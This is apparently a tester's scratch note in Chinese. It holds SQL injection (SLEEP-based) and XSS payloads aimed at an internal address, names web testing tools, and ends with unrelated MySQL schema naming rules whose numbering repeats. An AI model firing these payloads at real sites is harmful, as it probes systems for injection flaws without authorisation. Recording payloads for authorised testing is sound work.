1. http://10.200.9.190/****?appid=sports' AND SLEEP(5) AND 'GpQK'='GpQK
坑啊,原生态拼装写法。。。。。
2.http://10.200.9.190/****?appid=sports'<script> alert(444);</script>
hackbar
Safe3WVS工具比较好使
BurpSuite
https://legacy.gitbook.com/book/t0data/burpsuite/details
name=<img src=1 οnerrοr=alert(1)>
数据库规范
1、创建新表时需要主键, 主键名为 id 自增 且为 int 或 bigint 类型,新表id加主键时不能再为id加唯一索引
2、新表必须有注释,新表必须加除主键外的其他索引
3、新表前四列依顺序必须有id、create_time、update_time、description这四个默认列(时间类型datetime时间长度6,时间小数点0)
4、表fr_开头的列需排在非fr_开头的后面
3、数据表字段需要有注释, 且需要默认值,影响性能的字段默认值为空字符串
4、普通索引前缀为 idx_列名,唯一索引前缀uk_列名
5、外键所链接的表如果是字典表外键名前缀需fr_开头,非字典表需fr_tb_开头
6、 字段名不能为 MySQL 关键字
7、编码类型: utf8 或 utf8mb4